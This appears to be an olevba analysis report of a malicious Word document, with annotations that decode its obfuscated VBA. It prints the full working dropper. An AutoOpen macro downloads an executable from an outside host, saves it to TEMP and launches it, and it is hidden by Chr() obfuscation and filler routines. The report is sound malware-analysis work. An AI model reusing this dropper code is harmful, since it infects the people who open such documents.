dynamoo

Malicious Word macro

May 21st, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-H-- 000001.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 000001.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 000001.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub FFewegUU1(FUU2 As Long)
      ' Pass-through stub between the auto-exec entry point and the payload
      ' routine. The FUU2 argument is never read; the only statement calls
      ' mp268P5dmPj6hB (defined in Module2), which downloads and launches a file.
  17. mp268P5dmPj6hB
  18. End Sub
  19.  
  20. Sub autoopen()
      ' Auto-exec entry point: olevba flags AutoOpen as running when the Word
      ' document is opened. The constant 866 is a decoy value, because
      ' FFewegUU1 ignores its argument. Call chain visible in this report:
      ' autoopen -> FFewegUU1 -> mp268P5dmPj6hB -> DBzfavone / QN7pFLiUlj5.
  21. FFewegUU1 (866)
  22.  
  23. End Sub
  24.  
  25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  26. ANALYSIS:
  27. +----------+----------+---------------------------------------+
  28. | Type     | Keyword  | Description                           |
  29. +----------+----------+---------------------------------------+
  30. | AutoExec | AutoOpen | Runs when the Word document is opened |
  31. +----------+----------+---------------------------------------+
  32. -------------------------------------------------------------------------------
  33. VBA MACRO M11.bas
  34. in file: 000001.doc - OLE stream: u'Macros/VBA/M11'
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. Private Type tagInitCommonControlsEx
      ' Two-field structure (size, class flags) used only by InitXpStyle in
      ' this module. Nothing in the AutoOpen call chain touches it.
  37.    lngSize As Long
  38.    lngICC As Long
  39. End Type
  40.  
      ' Flag value stored into lngICC by InitXpStyle; not used anywhere else in
      ' this report.
  41. Private Const ICC_USEREX_CLASSES = &H200
  42.  
  43. Public Function InitXpStyle() As Boolean
      ' Fills a local tagInitCommonControlsEx and returns True when no error was
      ' raised while doing so. The structure is never passed to any API call in
      ' this listing, and no routine in the AutoOpen call chain references this
      ' function, so it plays no part in the download-and-run behaviour.
      ' NOTE(review): looks like benign filler padding the project - confirm
      ' against the full document.
  44.    On Error Resume Next
  45.    Dim iccex As tagInitCommonControlsEx
  46.    ' Ensure CC available:
  47.   With iccex
  48.        .lngSize = LenB(iccex)
  49.        .lngICC = ICC_USEREX_CLASSES
  50.    End With
  51.    InitXpStyle = (Err.Number = 0)
  52.    On Error GoTo 0
  53. End Function
  54.  
  55. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  56. ANALYSIS:
  57. No suspicious keyword or IOC found.
  58. -------------------------------------------------------------------------------
  59. VBA MACRO Module1.bas
  60. in file: 000001.doc - OLE stream: u'Macros/VBA/Module1'
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62.  
  63. Public Function RandomNumber(Upper As Integer, _
  64.      Lower As Integer) As Integer
      ' Re-seeds the generator with Randomize, then returns
      ' Int((Upper - Lower + 1) * Rnd + Lower). Within this report its only
      ' caller is RandomNumbers (Module2), which the AutoOpen call chain never
      ' reaches, so this is not part of the malicious path.
  65.     'Generates a Random Number BETWEEN the LOWER and UPPER values
  66.    Randomize
  67.     RandomNumber = Int((Upper - Lower + 1) * Rnd + Lower)
  68. End Function
  69.  
  70.  
  71. Public Function QN7pFLiUlj5(ZLJXSAoSKjsg As String)
      ' Execution step of the dropper. The ZLJXSAoSKjsg argument is never read.
      ' The Chr()/one-character concatenation on the next line decodes to the
      ' ProgID "Shell.Application"; it is split up so the name never appears in
      ' clear text for static string matching.
  72.     Set qQ7z6L8p5v2w = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
      ' ipekwUxeEk8dG is the Public variable declared in Module2, set by
      ' mp268P5dmPj6hB to <TEMP>\ribasiml.exe. Handing that path to the shell
      ' object's Open method presumably launches the downloaded executable.
  73. qQ7z6L8p5v2w.Open (ipekwUxeEk8dG)
  74. End Function
  75.  
  76.  
  77.  
  78.  
  79. Function RandomString(cb As Integer) As String
      ' Builds a random string of cb + 1 characters: the first is drawn from the
      ' letter set only, the remaining cb from letters plus digits. No routine
      ' in this report calls it, so it is not part of the AutoOpen chain.
  80.     Randomize
  81.     Dim rgch As String
  82.     rgch = "abcdefghijklmnopqrstuvwqyz"
  83.     rgch = rgch & UCase(rgch)
      ' First character: picked before digits are appended to the alphabet.
  84.     RandomString = Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
  85.     rgch = rgch & "0123456789"
  86.     Dim i As Long
  87.     For i = 1 To cb
  88.         RandomString = RandomString & Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
  89.     Next i
  90. End Function
  91.  
  92.  
  93. Public Function DBzfavone(CRSjLxvDjAsERi As String)
      ' Thin wrapper that returns CreateObject(<ProgID string>). mp268P5dmPj6hB
      ' routes its three object creations through it, so the CreateObject
      ' keyword does not appear in Module2 (olevba reports it for this module
      ' only); the ProgIDs themselves are assembled at the call sites.
  94.     Set DBzfavone = CreateObject(CRSjLxvDjAsERi)
  95. End Function
  96. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  97. ANALYSIS:
  98. +------------+--------------+-----------------------------------------+
  99. | Type       | Keyword      | Description                             |
  100. +------------+--------------+-----------------------------------------+
  101. | Suspicious | Open         | May open a file                         |
  102. | Suspicious | Chr          | May attempt to obfuscate specific       |
  103. |            |              | strings                                 |
  104. | Suspicious | CreateObject | May create an OLE object                |
  105. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  106. |            |              | be used to obfuscate strings (option    |
  107. |            |              | --decode to see all)                    |
  108. +------------+--------------+-----------------------------------------+
  109. -------------------------------------------------------------------------------
  110. VBA MACRO Module2.bas
  111. in file: 000001.doc - OLE stream: u'Macros/VBA/Module2'
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. Public ipekwUxeEk8dG As String
       ' Module-level variable holding the drop path; it is written below and
       ' read by QN7pFLiUlj5 in Module1 when the file is opened.
  114. Sub mp268P5dmPj6hB()
       ' Downloader/dropper body, reached from autoopen via FFewegUU1. Every
       ' ProgID, URL and file name is assembled from Chr() codes and
       ' one-character literals so none appears in clear text. The decoded
       ' values are given in the comments below, with the URL defanged.
       ' Indicators recoverable from this routine: the download URL and the file
       ' name ribasiml.exe in the process-level TEMP directory.
  115.  
       ' Decodes to DBzfavone("Microsoft.XMLHTTP") - the HTTP client object.
  116. Dim uDXIWGiqPdonzr: Set uDXIWGiqPdonzr = DBzfavone("M" & Chr(105) & Chr(99) & "r" & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & "H" & Chr(84) & "T" & Chr(80))
  117.  
       ' Decodes to DBzfavone("Adodb.Stream") - used in the handler below to
       ' write the response bytes to disk.
  118. Dim DAp2f0xJbq: Set DAp2f0xJbq = DBzfavone(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & Chr(83) & "t" & Chr(114) & "e" & "a" & Chr(109))
  119.  
       ' Decodes to: .Open "GET", "hxxp://mercury.powerweave[.]com/72/11.exe", False
       ' The third argument False makes the request synchronous, so Send blocks
       ' until the response has arrived.
  120. uDXIWGiqPdonzr.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "/" & Chr(109) & Chr(101) & "r" & Chr(99) & Chr(117) & Chr(114) & "y" & "." & Chr(112) & "o" & Chr(119) & "e" & "r" & Chr(119) & "e" & Chr(97) & "v" & Chr(101) & "." & "c" & Chr(111) & "m" & Chr(47) & Chr(55) & Chr(50) & Chr(47) & Chr(49) & Chr(49) & Chr(46) & "e" & Chr(120) & Chr(101), False
  121. uDXIWGiqPdonzr.Send
  122.  
       ' Decodes to DBzfavone("WScript.Shell").
  123. Set DHyz2v5mICG8 = DBzfavone("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")
  124.  
       ' Decodes to .Environment("Process") - the process-level environment block.
  125. Set YFKDZBHThU = DHyz2v5mICG8.Environment("P" & "r" & "o" & Chr(99) & Chr(101) & "s" & Chr(115))
  126.  
       ' Decodes to the lookup of the "TEMP" variable.
  127. qK8feLrqC67 = YFKDZBHThU("T" & Chr(69) & Chr(77) & Chr(80))
  128.  
       ' Decodes to <TEMP> & "\ribasiml.exe" - the path the payload is saved to.
  129. ipekwUxeEk8dG = qK8feLrqC67 & Chr(92) & "r" & Chr(105) & "b" & Chr(97) & "s" & Chr(105) & "m" & "l" & "." & "e" & Chr(120) & Chr(101)
  130.  
       ' Response bytes are taken as-is; no status code or content check is made
       ' before they are written and opened.
  131.   NmfekJVEW = uDXIWGiqPdonzr.responseBody
       ' Control-flow obfuscation: the division by zero always raises, so
       ' execution jumps to the Elhczuh7a label instead of continuing in line.
  132. On Error GoTo Elhczuh7a
  133.     a = 132 / 0
  134.   On Error GoTo 0
  135.  
       ' Never reached: the division above has already transferred control to
       ' the first handler, so this second block is dead code.
  136. On Error GoTo FeEH4er
  137.     b = 56 / 0
  138.   On Error GoTo 0
  139. vtDXeES9ee:
  140.   Exit Sub
  141. Elhczuh7a:
       ' Write stage: Type = 1 selects binary mode (adTypeBinary) and the
       ' SaveToFile option 2 overwrites an existing file (adSaveCreateOverWrite).
  142.     With DAp2f0xJbq
  143.        .Type = 1
  144.         .Open
  145.         .write NmfekJVEW
  146.         .savetofile ipekwUxeEk8dG, 2
  147.     End With
  148.    
       ' No Exit or Resume precedes this label, so the write stage falls straight
       ' through into the execution stage. The string literal passed here is
       ' ignored by QN7pFLiUlj5, which opens ipekwUxeEk8dG instead.
  149. FeEH4er:
  150.   QN7pFLiUlj5 ("NcJdYOPr1F")
       ' Leaves the handler and returns via the Exit Sub at vtDXeES9ee.
  151. Resume vtDXeES9ee
  152. End Sub
  153.  
  154. Public Function RandomNumbers(Upper As Integer, _
  155.    Optional Lower As Integer = 1, _
  156.    Optional HowMany As Integer = 1, _
  157.    Optional Unique As Boolean = True) As Variant
       ' Returns a Variant array of HowMany values picked from a collection
       ' holding Lower..Upper, removing each pick when Unique is True. Any error
       ' is caught by LocalError, which returns an empty string instead.
       ' No routine in the AutoOpen call chain calls this function.
       ' NOTE(review): looks like benign filler sitting next to the dropper
       ' routine in the same module - confirm against the full document.
  158. '*******************************************************
  159.    'This Function generates random array of
  160.    'Numbers between Lower & Upper
  161.    'In Addition parameters can include whether
  162.    'UNIQUE values are required
  163.  
  164.    'Note the Result is INCLUSIVE of the Range
  165.  
  166.     'Debug Example:
  167.    'x = RandomNumbers(49, 1, 7)
  168.    'For n = LBound(x) To UBound(x): Debug.Print x(n);: Next n
  169.    'WARNING HowMany MUST be greater than (Higher - Lower)
  170.    '******************************************************
  171.  
  172.     On Error GoTo LocalError
  173.     If HowMany > ((Upper + 1) - (Lower - 1)) Then Exit Function
  174.     Dim X           As Integer
  175.     Dim n           As Integer
  176.     Dim arrNums()   As Variant
  177.     Dim colNumbers  As New Collection
  178.    
  179.     ReDim arrNums(HowMany - 1)
  180.     With colNumbers
  181.         'First populate the collection
  182.        For X = Lower To Upper
  183.             .Add X
  184.         Next X
  185.         For X = 0 To HowMany - 1
       ' Index is drawn by RandomNumber (Module1), called here with 0 as its
       ' Upper argument and Count + 1 as its Lower argument.
  186.             n = RandomNumber(0, colNumbers.Count + 1)
  187.             arrNums(X) = colNumbers(n)
  188.             If Unique Then
  189.                 colNumbers.Remove n
  190.             End If
  191.         Next X
  192.     End With
  193.     Set colNumbers = Nothing
  194.     RandomNumbers = arrNums
  195. Exit Function
  196. LocalError:
  197.     'Justin (just in case)
  198.    RandomNumbers = ""
  199. End Function
  200.  
  201. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  202. ANALYSIS:
  203. +------------+------------+-----------------------------------------+
  204. | Type       | Keyword    | Description                             |
  205. +------------+------------+-----------------------------------------+
  206. | Suspicious | Open       | May open a file                         |
  207. | Suspicious | Chr        | May attempt to obfuscate specific       |
  208. |            |            | strings                                 |
  209. | Suspicious | SaveToFile | May create a text file                  |
  210. | Suspicious | Write      | May write to a file (if combined with   |
  211. |            |            | Open)                                   |
  212. +------------+------------+-----------------------------------------+
  213. -------------------------------------------------------------------------------
  214. VBA MACRO M3.bas
  215. in file: 000001.doc - OLE stream: u'Macros/VBA/M3'
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
       ' Toolbar name shared by DeleteBar and BuildBar. The literal value
       ' "ToolbarName" looks like an unfilled template placeholder - TODO confirm.
  217. Public Const gsTOOLBARNAME As String = "ToolbarName"
  218.  
  219.  
  220.  
  221.  
  222. Public Sub DeleteBar()
       ' Deletes the command bar named gsTOOLBARNAME, ignoring the error raised
       ' when it does not exist. No routine in the AutoOpen call chain calls it.
  223.     On Error Resume Next
  224.         Application.CommandBars(gsTOOLBARNAME).Delete
  225.     On Error GoTo 0
  226. End Sub
  227.  
  228. Public Sub BuildBar()
       ' Recreates the command bar named gsTOOLBARNAME and adds one button to it.
       ' The button's caption "CAPTION" and action "module.Sub" look like
       ' unfilled template placeholders - TODO confirm. No routine in the
       ' AutoOpen call chain calls this sub, so it is not part of the
       ' download-and-run path shown in this report.
  229.    
  230.     Dim cbrBar As CommandBar
  231.     Dim ctlButton As CommandBarButton
  232.     Dim ctlDropDown As CommandBarPopup
  233.    
       ' Remove any existing bar of the same name; a missing bar is ignored.
  234.     On Error Resume Next
  235.         Application.CommandBars(gsTOOLBARNAME).Delete
  236.     On Error GoTo 0
  237.    
  238.     ' Create the command bar.
  239.    Set cbrBar = Application.CommandBars.Add(gsTOOLBARNAME, _
  240.                                         msoBarTop, False, True)
  241.     cbrBar.Visible = True
  242.    
  243.     ' Add the controls required by our application.
  244.    Set ctlButton = cbrBar.Controls.Add(msoControlButton)
  245.     With ctlButton
  246.         .Style = msoButtonIconAndCaption
  247.         .Caption = "CAPTION"
  248.         .FaceId = 107
  249.         .OnAction = "module.Sub"
  250.     End With
  251.  
  252. End Sub
  253.  
  254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  255. ANALYSIS:
  256. No suspicious keyword or IOC found.
  257. -------------------------------------------------------------------------------
  258. VBA MACRO Module3.bas
  259. in file: 000001.doc - OLE stream: u'Macros/VBA/Module3'
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261.  
  262. Option Explicit
  263. Public Function Add_UniqueItem(ByRef cboBox As ComboBox, ByRef itemText As String, Optional ByVal cmpMethod As VbCompareMethod = vbBinaryCompare) As Boolean
       ' Adds itemText to cboBox unless an existing entry compares equal under
       ' cmpMethod. Returns True when the item was added, and False when cboBox
       ' is Nothing or a match was found. No routine in the AutoOpen call chain
       ' calls it. The error message names "ssMDBQuery.MComboboxHelper", which
       ' suggests the code was copied from an unrelated project - TODO confirm.
  264.         '<EhHeader>
  265.        On Error GoTo Add_UniqueItem_Err
  266.         '</EhHeader>
  267.  
  268.     Dim i As Long
  269.  
  270. 100 Add_UniqueItem = False
  271.  
  272. 102 If cboBox Is Nothing Then Exit Function
  273.  
  274. 104 With cboBox
  275.  
  276. 106     For i = 0 To .ListCount
  277. 108         If StrComp(.List(i), itemText, cmpMethod) = 0 Then Exit Function
  278.         Next
  279.        
  280. 110     .AddItem itemText
  281.  
  282.     End With
  283.  
  284. 112 Add_UniqueItem = True
  285.  
  286.         '<EhFooter>
  287.        Exit Function
  288.  
  289. Add_UniqueItem_Err:
       ' Shows the error text and the Erl line label, then resumes at the
       ' statement after the one that failed.
  290.         MsgBox Err.Description & vbCrLf & _
  291.                "in ssMDBQuery.MComboboxHelper.Add_UniqueItem " & _
  292.                "at line " & Erl
  293.         Resume Next
  294.         '</EhFooter>
  295. End Function
  296.  
  297.  
  298. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  299. ANALYSIS:
  300. No suspicious keyword or IOC found.